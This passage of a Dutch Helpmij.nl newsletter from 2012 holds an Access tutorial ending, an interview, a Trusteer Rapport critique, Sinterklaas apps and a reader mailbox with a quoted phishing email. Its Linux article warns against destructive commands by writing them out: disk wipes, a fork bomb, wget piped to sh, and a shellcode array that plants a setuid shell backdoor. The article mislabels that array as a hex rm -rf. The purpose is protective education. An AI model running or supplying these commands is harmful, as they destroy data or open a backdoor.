            EersteLetter = Letter
    End Select
End Function

De Select Case kijkt hier naar de letter in de variabele <Letter>, en bepaalt op basis daarvan welke letter er wordt geretourneerd in het veld BeginLetter in de query (zie code hierboven). En op basis van dat veld wordt dus uiteindelijk de knop geactiveerd of niet.

Als je alle code hebt gemaakt, kun je het formulier testen!

Samenvatting

In dit hoofdstuk heb je een formulier gemaakt waarmee je selecties kunt maken middels een keuzelijst. De lijst kun je met Alfabet knoppen filteren op basis van een beginletter. Voor het bepalen van de juiste beginletters zijn functies gemaakt, die in een query gebruikt kunnen worden. Door deze functies Public te maken, kun je ze ook rechtstreeks in een query gebruiken; ze zijn dus niet alleen bruikbaar binnen een formulier.

Het formulier is gekoppeld aan een vaste tijdelijke tabel, die steeds opnieuw gemaakt wordt met records uit andere tabellen. Door een vaste structuur te gebruiken voor die tijdelijke tabel, kun je andere queries en keuzelijsten baseren op die tijdelijke tabel.

Opdracht

Maak een multifunctioneel formulier op basis van de tabel st_Duiklocaties, waarin de lijst wordt gebaseerd op de cyclus <Duiklanden> à <Duiklocaties> à <Duikplaatsen>.

Zorg er ook voor dat de knoppen correct filteren op de beginletter.

Bestanden

Dit hoofdstuk maakt gebruik van de tabellen uit de Postcodetabel die je hier kunt downloaden.
In de vaste topic van het Access forum vind je de database met de Duikclub bestanden en een leeg formulier, en de uitwerking van dit hoofdstuk.




Interview

Auteur: jackall

Top

Deze maand is de beurt aan D0mzy

Hallo D0mzy vertel eens wie je bent.

Mijn naam is Mike, ik ben 19 jaar en woon momenteel in Helmond. Ik sport,
ik heb altijd voetbal gedaan, maar heb daarvoor judo in de plaats gekozen.
Dat kwam omdat ik het verbale geweld op het veld niet zo waardeerde, bij elke
wedstrijd was er wel iemand het slachtoffer.

Wat doe je in het dagelijks leven voor werk?

Ik noem zaterdag geen dagelijks leven, maar ik werk die dag bij de Albert Heijn als
vakkenvuller. Ik ben voornamelijk actief als versmedewerker, maar kan ook
ingezet worden als caissiére.

Je bent sinds 2008 actief op Helpmij.nl, hoe ben je eigenlijk hier terecht
gekomen.

Ik denk dat ik hier terecht ben gekomen door te zoeken naar een 'helpsite'
voor een vraag die ik had.

Wat was jouw eerste vraag die je zelf op het forum hebt gesteld?

Moet dat nou echt? Vier jaar geleden was ik nog een onwetende tiener die
een vraag stelde over hacks, haha!

Hoe ben je eigenlijk aan de nickname D0mzy gekomen?

Leuk dat iedereen deze vraag altijd stelt. Voorheen (nu nog steeds,
maar minder) hield ik echt van spelletjes. Computerspelletjes,
gezelschapspelletjes, noem maar op. Mijn naam komt van de vijand van de
hoofdrolspeler van Beyond Good and Evil. Waarom ik die naam koos? Geen
idee, het klonk wel grappig om achter "domz" een Y te plakken en er een
eigen draai aan te geven met een cijfer. Hoewel het spel nog steeds enorm
leuk blijft, hoor!

In je profiel staat dat je nog studeert, welke studie volg je momenteel?

Momenteel ben ik een derdejaars Informatica student bij Avans Hogeschool in
Den Bosch. De richting die ik heb gekozen is Softwareontwikkelaar, dus meer
de programmeerkant.

Waar werk je vooral mee? Desktop/laptop? En wat doe je er voornamelijk mee.
O.a. Met welke software werk je regelmatig.

Voor mijn studie heb ik een eigen laptop, waar ik eventueel spelletjes op
kan spelen. Dat doe ik nog steeds op mijn sterkere desktop. Deze laptop is
puur schoolgebruik, denk dan aan Office en Microsoft Visual Studio voor
softwareontwikkeling.

Heb je op het forum of in de privé-kring weleens iets stoms meegemaakt op
computergebied, waardoor je nu wel 3x nadenkt?

Ik heb nog geen stomme dingen meegemaakt. Maar wat nog niet is, kan altijd nog komen!

Heb je nog enige tips voor de overige Helpmij gebruikers?

Als je dringend hulp nodig hebt, ga dan naar de chat. Dat werkt meestal sneller en is veel gezelliger dan het forum!

D0mzy, bedankt voor je medewerking aan dit interview.




Trusteer Rapport gebruiken of juist niet

Auteur: CorVerm

Top

Op het moment dat een artikel wordt aangeboden in de redactietool kunnen de mederedacteuren het artikel lezen en beoordelen. Zo ook in dit geval. Ik had een artikel geschreven over Trusteer Rapport omdat ING op haar website sinds enige tijd dat programma aanbied. Het betreft gratis beveiligingssoftware onder de slogan: "Last van Trojaanse paarden? In galop deze gratis software erop!". Het programma dient als aanvullend pakket om de browserbeveiliging te optimaliseren. In tegenstelling tot het verleden stelt ING dit pakket ter beschikking uit preventief oogpunt.

Mijn collega femke98 reageerde met het sturen van een drietal links, waarvan twee naar sites waar een discussie gaande is over dit programma. Helaas stellen die discussies niet veel voor, zeker niet als het over de (on)zuivere werking van Trusteer Rapport gaat. Allerlei (complot)theorieën doen de ronde die naar mijn idee niet steekhoudend zijn. In ieder geval kan niemand duidelijk maken waarom het programma niet zou deugen. Want dat is hetgeen overheerst in de discussies, het zou om een gemakkelijk manipuleerbaar programma gaan, men zou geen greep hebben op het programma. Onvoldoende gegevens dus om er een gefundeerd oordeel over op te bouwen.

De Amerikaanse sites die ik in verband met dit onderwerp bezocht heb geven iets meer inzicht in de problematiek die Trusteer Rapport heet. Terwijl de ene gebruiker met het programma wegloopt, verafschuwt een ander het. Meldingen van crashende browsers tot het compleet vastlopen van systemen zijn aan de orde van de dag. Terwijl, volgens opgave van Trusteer, 50 Amerikaanse banken en een enkele Engelse bank Trusteer Rapport bij hun klanten aanbevelen. Maar ook hier blijft de vraag of het een veilig en betrouwbaar programma is open.

Hoe je het ook bekijkt, het is en blijft tamelijk schimmig rond het programma. ING beveelt ons aan dit programma aan en onwillekeurig rijst de vraag of het programma wel op een degelijke manier door hen getest is. In feite bieden zij het programma “wereldwijd” aan, het is immers voor een ieder die de site van ING bezoekt te downloaden en te installeren. Dus niet echt exclusief voor ING-klanten. Bovendien geeft ING geen enkele uitleg over Trusteer Rapport en dat doet een beetje vreemd aan.

Dit alles overziende heb ik besloten om het artikel over Trusteer  Rapport niet te plaatsen. Ondanks dat ik het programma getest heb en tot de conclusie ben gekomen dat het programma doet wat belooft te doen. Gelijk moet ik erbij zeggen dat, met de eenvoudige middelen die mij ten dienste staan, ik niet echt ver achter de schermen kan kijken.

Het besluit om niet tot plaatsing van het artikel over te gaan is versterkt door wat ik in de review over Rapport las op de site van PC active. Hoewel ik, op grond van mijn eigen ervaring, het niet met alle conclusies die daar getrokken worden eens ben, geven zij toch genoeg info die mijn besluit rechtvaardigen. Lees zelf de review en (be)oordeel voor jezelf of je eventueel het programma wilt gaan gebruiken of niet.

Ik sprak over een derde link die femke98 mij toestuurde. En ja hoor, waar sommigen al bang voor waren is geschied. De link verwijst inderdaad naar een onveilige site. Criminelen zitten niet stil en wie zal zeggen hoe eenvoudig Trusteer Rapport te manipuleren is. In ieder geval wordt getracht een beveiligde site te openen. Raar, want de download die je zowel via de site van ING als  die van Trusteer binnenhaalt gaat gewoon via een open verbinding. De boodschap die de browser dan ook geeft is in IE: “Er is een probleem met het beveiligingscertificaat”, in Ff: “Deze verbinding is niet beveiligd”.

 november 2012: chrome beveiliging..jpg

De meest duidelijke boodschap geeft Google Chrome en laat niets aan duidelijkheid te wensen over.

Ook bij SpicyLemon heeft men zo z'n bedenkingen over Trusteer Rapport. Vandaar dat we hun persbericht aangaande Trusteer Rapport hieronder plaaten.

Voordat je het persbericht gaat lezen moet mij van het hart dat Trusteer Rapport zeer moeilijk te deinstalleren is. Denk daaraan in het geval je de stap neemt om het programma toch uit te proberen.


SpicyLemon plaatst kritische noot bij beveiligingssoftware voor klanten ING

Sliedrecht, 17 oktober 2012 - Beveiligingsspecialist SpicyLemon plaatst een kritische noot bij de beveiligingssoftware, die ING gratis aan klanten biedt. Klanten moeten zo (beter) beschermd zijn tegen bancaire trojans en andere malware. Nienke Ryan, managing director SpicyLemon: “We vrezen dat mensen het gevoel hebben beschermd te zijn, terwijl dit in feite een vals gevoel van veiligheid is. Het belang van goede antivirusbescherming moet niet worden onderschat.”

De door ING aangeboden software wordt geactiveerd wanneer de browser start. Op dat moment worden een aantal Windows modules, zoals bijvoorbeeld de schermafdruk module, geïsoleerd en zou malware hier theoretisch niet meer bij kunnen. Het minpunt aan deze methode is dat de software niet altijd een goede grip kan krijgen op systemen die al geïnfecteerd zijn, terwijl de gebruikers nu wel een vals gevoel van veiligheid hebben. Daarbij komt nog dat het agressieve gedrag van deze software veel antivirusproducten aan kan laten slaan. Wat als consumenten voor het gebruiksgemak de antivirusbescherming helemaal uitzetten?

De software kan niet kijken naar verdacht gedrag (heuristiek) van processen zoals goede antivirus bescherming dat wel doet en is ook geen firewall. Op het moment dat het systeem geïnfecteerd is en cybercriminelen toegang hebben tot de PC van een gebruiker, is de integriteit van het pakket natuurlijk ook in gevaar. SpicyLemon vreest dat mensen het gevoel hebben, beschermd te zijn met de software, terwijl dit in feite een vals gevoel van veiligheid is. Het belang van goede en up-to-date antivirusbescherming moet niet worden onderschat.

Phishingaanvallen gemist door antivirussoftware

Aan de hand van een test van Cyveillance's 2H 2008 Cyber Intelligence Report, wordt gesteld dat veel antivirussoftware bancaire- en phishing aanvallen missen. Righard Zwienenberg, Senior Research Fellow bij ESET, geeft hierop de volgende reactie. “We leven in een snelle digitale wereld, waarin dreigingen elkaar snel opvolgen en technologisch vooruitstrevende bedrijven continue werken aan oplossingen. Het is daarom bizar om een testrapport uit februari 2009 te gebruiken, met gegevens uit het laatste kwartaal van 2008. Dat is inmiddels vier jaar geleden.”

“ESET heeft sinds die tijd vele nieuwe technologische technieken ontwikkeld om de detectie te bevorderen, zowel op het gebied van malware als spam. Recentelijk is versie 6.0 van ESET, met de nieuwe anti-phishing-techniek, getest door AV-Comparatives. Uit deze test blijkt dat deze nieuwe techniek een extreme verbetering is en blokkeert het 94% van de aanvallen, waardoor deze versie de vierde plek inneemt in de vergelijking.

november 2012: spicy..jpg




De 8 gevaarlijke commando's Linux terminal

Auteur: femke98

Top

De meeste Linux commando's lezen input, zoals de inhoud van een bestand, argumenten en opties. Ze schrijven output. Standaard komt de input van het toetsenbord, output komt op het scherm in een terminalvenster.

Je toetsenbord wordt het standaard input apparaat genoemd. Men kort dit af als stdin. Je scherm noemt men het standaard output apparaat, afgekort als stdout.

Foutmeldingen van commando's worden als een apart type output behandeld, hoewel ze standaard naar hetzelfde apparaat als de standaard output gestuurd worden. Die foutmeldingen noemt men standaard error, afgekort stderr.

Echter Linux is een zeer flexibel systeem. De standaardinstellingen kunnen ook anders zijn. Zo zou standaard input een bestand kunnen zijn in plaats van een toetsenbord, en standaard output zou een printer kunnen zijn in plaats van je scherm.

Nu bestaan er veel commando's voor de terminal. Je geeft dus via je input een commando aan de output.

Als je nieuw bent met Linux, is de kans groot dat je een trol ontmoet op een forum of in een chatroom die je kan verleiden tot het gebruik van commando's die schade kunnen toebrengen aan je bestanden of zelfs aan je gehele besturingssysteem.

Uitleg trol (internet) Wikipedia:

Een trol is een persoon die op fora, websites of chatkanalen berichten plaatst met het doel voorspelbare emotionele reacties (bijvoorbeeld woede, irritatie, verdriet, of scheldpartijen - ook wel flames genoemd in internetjargon) van andere mensen uit te lokken, desinformatie geeft - en dit als informatie laat overkomen - of in een rol kruipt en een vertekend beeld van zichzelf geeft. Bijvoorbeeld door leuzen uit te roepen die geen betrekking hebben op de eigen mening. (einde uitleg)

Om dit gevaarlijke scenario te vermijden, staat hieronder een lijst met 8 dodelijke Linux-commando's die je zeker niet moet gebruiken.

Het leren van de commando's die je juist niet moet ingeven plus het leren van hoe Linux nu eigenlijk in elkaar steekt en werkt, kan je beschermen tegen deze trollen op het internet.

Merk op dat veel van deze commando's alleen gevaarlijk zijn als ze voorafgaand met sudo op Ubuntu worden uitgevoerd, anders werken ze niet. Op andere Linux distributies, moeten de meeste commando's als root worden gedraaid.

De gevaarlijke commando's:

1.  rm-rf / - Hiermee verwijder je alles!

Het commando rm-rf / verwijdert alles wat het mogelijk is, inclusief bestanden op je harde schijf en bestanden op aangesloten verwijderbare media. Deze opdracht is wat begrijpelijker als je het apart van elkaar ziet:

rm - Verwijderd de volgende bestanden.

-rf - Voert rm herhaaldelijk uit (Verwijderd alle bestanden en mappen in de opgegeven map) en verwijderd alle bestanden zonder waarschuwing vooraf.

/ - Vertelt rm om bij de root-directory te beginnen, waar zich alle bestanden van je computer bevinden. 

De les: pas op voor rm -rf.
Er bestaan overigens veel varianten op het rm commando. Let dus in het algemeen op commando's die beginnen met rm.

2. Verkapte rm –rf / 

Hier is nog zo'n stukje code wat over het hele internet gaat en waar je voor op moet passen

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
“x6ex2fx73x68x00x2dx63x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Dit is de hex versie van rm-rf / - het uitvoeren van deze opdracht zou al uw bestanden wegvagen, net als wanneer je rm-rf / als opdracht ingeeft.

De les: Voer geen vreemde uitziende, uiteraard vermomde opdrachten uit, die je niet begrijpt.

3. : () {: |: &};: - Forkbomb

De volgende regel is een simpel ogende, maar wel een gevaarlijke bash functie:

:(){ :|: & };:

Het commando maakt dat een soort van programmaatje kopieen van zichzelf maakt, net zolang tot alle resources van de computer gebruikt zijn en de machine crashed. Het proces herhaalt zichzelf voortdurend en de kopieën zullen zichzelf steeds verder voortplanten. Het is eigenlijk een denial-of-service-aanval. (dit heet dus forkbomb)

De les: Bash functies, ook al zijn ze zeer kort, zijn krachtig.

4. mkfs.ext4 /dev/sda1 – Formatteert een harde schijf

De opdracht mkfs.ext4 / dev/sda1 is eenvoudig te begrijpen:

mkfs.ext4 - Maakt een nieuw ext4 bestandssysteem aan op het volgende apparaat.

/ dev/sda1 - Geeft de eerste partitie op de eerste harde schijf aan, die waarschijnlijk in gebruik is.

Bij elkaar genomen, kan deze opdracht vergelekenworden met het uitvoeren van format c: op Windows - het zal de bestanden wissen op je eerste partitie en zullen vervangen worden door een nieuw bestandssysteem.

Deze opdracht kan in andere vormen voorkomen, zoals - mkfs.ext3 / dev/sdb2

Deze opdracht zal dus de tweede partitie formatteren naar het ext3 bestandssysteem.

De les: Pas op met het uitvoeren van opdrachten die beginnen met / dev / sd.

5. command> / dev / sda - Schrijft direct naar een harde schijf

De opdracht command > / dev / sda werkt op vergelijkbare wijze – het voert een opdracht uit en stuurt de output van dat commando direct naar de eerste vaste schijf; het schrijft dus alle gegevens direct naar de harde schijf waardoor er schade aan je bestandssysteem ontstaat.

command - Voert een commando (kan een commando worden.)

> - Stuurt de uitvoer van de opdracht naar de volgende locatie.

/ dev / sda - Schrijft de uitvoer van de opdracht naar de harde schijf.

De les: Zoals hierboven, let op het uitvoeren van opdrachten beginnen met / dev / sd die harde schijf apparaten erbij betrekken.
6. dd if = / dev / random of = / dev / sda - Schrijft troep op een harde schijf
De dd if = / dev / random of = / dev / sda opdracht zal ook de gegevens vernietigen op een van uw harde schijven.

dd - Voert een Low-level kopiëren van de ene locatie naar de andere uit.

if = / dev / random - Gebruik / dev / random (willekeurige data) als de input – je kan ook locaties, zoals / dev / zero (nul) bekijken

of = / dev / sda – Vervangt het bestandssysteem op de eerste harde schijf met willekeurige wartaal.

De les: dd kopieert gegevens van de ene locatie naar de andere, wat gevaarlijk kan zijn als je direct wilt kopiëren naar een ander apparaat.
7. mv ~ / dev / null – Verzet de persoonlijke map naar een “zwart gat”
/ dev / null is een andere bijzondere locatie - het verplaatsen van iets naar / dev / null is hetzelfde als het vernietigen. Denk aan / dev / null als een zwart gat. In wezen, mv ~ / dev / null stuurt al je persoonlijke bestanden naar een zwart gat.

mv - Verplaats het volgende bestand of de map naar een andere locatie.

~ - Geeft je hele persoonlijke map weer..

/ dev / null - verplaats je persoonlijke map naar / dev / null, het zal al je bestanden vernietigen en het verwijderd alle originele exemplaren.

De les:
De ~ teken staat voor je persoonlijke map en het verplaatsen van zaken naar / dev / null zal het vernietigen.
8.  wget http://example.com/something-O - | sh - Download en voert een script uit
Het bovenstaande commando downloadt een script van het web en stuurt dit naar sh, die de inhoud van het script gevoerd. Dit kan gevaarlijk zijn als je niet zeker weet wat het script is of als je de bron niet vertrouwt – voer dus geen niet-vertrouwde scripts uit.

wget - Download een bestand.

http://example.com/something - Download het bestand van deze locatie.

| - Pijplijn verzendt de output van de wget commando (het bestand dat je download) rechtstreeks naar een andere opdracht.

(Het verticale streepje noemt men in het Engels een pipe. Vandaar dat dit proces ook wel eens pipen genoemd wordt. De Nederlandse term is pijplijn.)

sh - Stuurt het bestand naar de sh commando, waarin deze wordt uitgevoerd als een bash-script.

De les: Download geen niet-vertrouwde scripts vanaf het web, en voer ze ook niet uit, zelfs niet met een commando.

Algemene les: Ga niet in op verzoeken van anderen om iets uit te proberen op je Linux computer; wanneer je ergens een probleem mee hebt, zoek dan een forum op dat als goed bekend staat. En hoewel het mogelijk is dat op goede bekende fora ook trollen voorkomen, zullen die al heel snel worden gevonden door de moderators van dat forum. Trollen vallen eigenlijk best heel snel door de mand.

Voer zelf ook geen commando's uit waarvan je niet weet wat ze doen. Vraag het ergens na of laat het commando richting prullenbak gaan. Vertrouw eigenlijk alleen jezelf!

(De gevaarlijke commando's zijn vertaald vanaf deze site.)




Sint apps

Auteur: CorVerm

Top

november 2012: sint15..gif

Nog even en de goedheiligman is weer in het land. Uiteraard gaan we niet voorbij aan dit feit, daarom hebben we een aantal apps bijeengeraapt. Hopelijk kun je met deze apps, samen met de kinderen, veel plezier beleven.

De Sint Videobelt
Spreek in de animatie zelf de stem van sinterklaas in.

De Club Van Sinterklaas
Leuk voor de kids.

Sint Chef
Recepten voor op of rond 5 december.

Gedichten generator
Maak met behulp van deze app een mooi gedicht.

SinterklaasHulp
Rijmen en liedjes.

Download Sinterklaasliedjes
Voor de meezingers op de verjaardag van onze goede Sint.

Sint Shopping
Maak verlanglijstjes en houdt het budget bij.

Wordt niet boos op mij als er apps genoemd zijn die niet doen wat je ervan verwacht. Ik heb de apps niet kunnen testen, domweg omdat ik niet over de juiste apparatuur beschik.
Werken de apps niet of niet goed? Verklik het aan sinterklaas. Misschien dat nu lukt wat mij als kind niet gelukt is, meegenomen worden naar Spanje. Een andere optie is om bij Sint een goed woordje voor mij te doen, wellicht dat hij mij een iPhone of iPad wil schenken november 2012: knipoog..jpg.




Postvak-in

Auteur: Redactie

Top

In onze vaste rubriek beantwoorden we vragen aan de hand van onze nieuwsbrief en plaatsen we reacties van onze lezers.

oktober 2012: pvi..jpg

Beste Helpmij,

Allereerst mijn complimenten voor wederom een goede nieuwsbrief. Altijd weer lees ik deze aandachtig door, altijd handig deze tips. En natuurlijk probeer ik een aantal dingen uit en vaak genoeg klopt alles nauwkeurig.

Echter ook wat opmerkingen mbt de laatste nieuwsbrief.

Het verhaal van ESET klopt niet helemaal. Je kan deze kosteloos downloaden, dat klopt. Echter is hier de melding vergeten dat het om een trialversie gaat en dus na 30 dagen deze aangeschaft kan worden. Hier zou ik dan ook de Norton app aanbevelen, deze is wel kosteloos.

Tevens wordt er gesproken over ene toolbar cleaner. Een beetje computergebruiker weet inmiddels wel dat deze cleaner eigenlijk overbodig is als je al Ccleaner of Slimcleaner op je pc hebt staan.

Dit was het eigenlijk en ik zal proberen vaker op jullie forum te komen.

Met vriendelijke groet,

Ruud Paap

Bedankt voor de complimenten Ruud, wij doen altijd weer ons best om een degelijke nieuwsbrief te versturen.

Wat betreft de onlinescanner van Eset heb je gelijk, inderdaad is vergeten om te vermelden dat het om een 30 dagen probeerversie gaat. Bij deze is dat rechtgezet, alhoewel dat op de site van Eset duidelijk vermeldt staat.

Ja, en dan hetgeen je schrijft over Toolbar Cleaner ten opzichte van CCleaner en SlimCleaner. Toolbar Cleaner houdt zich uitsluitend bezig met het verwijderen van (vaak ongewenste) toolbars, daarentegen zijn de andere genoemde cleaners bedoeld om systemen op te schonen.


Hallo,

Dan lees ik: yes een programma om ASK weg te halen, eindelijk.

Ik bekijk het voorbeeld waarop ASK duidelijk aanwezig is in de Toolbar Cleaner, maar als ik het programma opstart ziet hij de toolbar, die niet weg te krijgen is, niet eens.

Of doe ik iets verkeerds????????????????

abc1944

Duidelijk is ook dat de laatste versies van ASK zich helaas niet meer laten verwijderen door een programma als Toolbar Cleaner. Je kunt het beste aan de slag gaan met Revo Uninstaller alwaar je kiest voor de onderste optie (Gevorderd). Op deze manier verwijder je echt alle sporen die ASK na een gewone deinstallatie achter laat.
Er bestaat wel een programmaatje genaamd ASKtoolbarRemoval.exe, maar die raad ik je niet aan. Fsecure geeft aan dat de site onveilig is, hetgeen overigens niet wil zeggen dat het programmaatje ook onveilig is. Ik waag het er in ieder geval niet op om naar die site te gaan.

Krijgt Revo Uninstaller ASK ook niet weg dan kun je (via een omweg) ASKtoolbarRemoval.exe toch downloaden. Op de webpagina staat alleen de tekst “Bijlage downloaden”. Let wel: het is niet door ons getest, gebruik is dus op eigen risico.


Beste medewerkers

Heel hartelijk dank voor de aandacht die u in uw Nieuwsbrief hebt willen besteden aan mijn (en dat van meerdere PC gebruikers) gestelde probleem met betrekking tot het instellen van Google Chrome als standaard browser. Ik heb uw advies uiteraard opgevolgd, want inderdaad kwam Google Chrome in mijn lijstje voor. Echter na 2 dagen ontstaat hetzelfde probleem: "Google Chrome kan de standaard browser niet bepalen of instellen". Indien ik dan eerst IE weer instel als standaardbrowser, kan ik vervolgens Chrome opnieuw instellen als standaardbrowser, helaas echter voor een aantal dagen, waarna ik weer terug bij af ben. Hoe en waardoor zulks steeds ontstaat is voor mij een raadsel, voor u misschien een weet......

Met groet,

Martin van de Vorst.

Het vervelende is dat Internet Explorer wel als standaardbrowser is in te stellen maar niet als zodanig uit te schakelen is. Daarvoor ben je afhankelijk van een andere browser. Stel je die als standaard in dan wordt Internet Explorer geacht niet meer als standaard te fungeren.

Wat rest is om alle cookies en alle surfresten uit Internet Explorer te verwijderen en deze onmiddellijk weer af te sluiten. Start Chrome op en zet deze, indien je de keus (weer) krijgt op standaard. Zet ook deze stap geen zoden aan de dijk dan zit er niets anders op dan Internet Explorer te deinstalleren. Je doet dat door naar het configuratiescherm > Software te gaan en te kiezen voor Windows onderdelen toevoegen of verwijderen. Het kan ook zijn dat, in verband met een update van Internet Explorer, deze ook voorkomt in de “gewone” lijst met geïnstalleerde software. Uiteraard verwijder je die ook.

Veel succes.


Aan de redactie van Helpmij.nl
Van Joke van Zuylen, die de onderstaande mail ontving.

AAN ALLE e-mailgebruikers.

Helpdesk is een informatie en bijstand bron die problemen oplossen van problemen met uw account. U heeft overschreden de limiet van uw mailbox ingesteld door onze IT-service, en vanaf nu kan je niet ontvangt alle binnenkomende e-mails. Het programma loopt om ervoor te zorgen uw inbox niet te groot worden, waardoor u van het ontvangen of verzenden van nieuwe e-mail. Om dit te voorkomen, wordt u geadviseerd om te klikken op de onderstaande link om uw account opnieuw in te stellen. Uw account is het ervaren van een onverwacht beëindiging. U wordt geadviseerd om te klikken op de onderstaande vragenlijst voor activering, vullen en de onderstaande informatie in te dienen, terwijl onze Message Center onmiddellijk verifiëren uw account. Klik op de onderstaande link:

**LINK**

llQk5OVk9TYmdnYmdGLVdwSU5vclE6MQ

Onvermogen om de vragenlijst in te vullen op de link maken uw account inactief binnen de komende 24 uur. Neemt u vindt deze boodschap belangrijk.

Fout-id: 0x800CCC0F

Protocol: POP3

Poort: 110

Beveiligd (SSL): Nee

Dank u.

Helpdesk! Account Services.

Het betreft hier duidelijk een, in zeer "hoogstaand" Nederlands geschreven, spambericht. Laat duidelijk zijn dat een dergelijke Google-vertaling meteen een bel moet laten rinkelen als je zo'n mail ontvangt. Maar buiten dat, de mail is niet afkomstig van je provider en welk soort Helpdesk houdt zich met dit soort zaken bezig? Derhalve willen we er ten overvloede nog maar eens op wijzen dat een reactie van jouw kant heel nare gevolgen kan hebben. Reageer nooit en klik dus ook nooit op een link die in de mail staat en merk dit soort berichten altijd aan als zijnde SPAM.


Wees gewaarschuwd!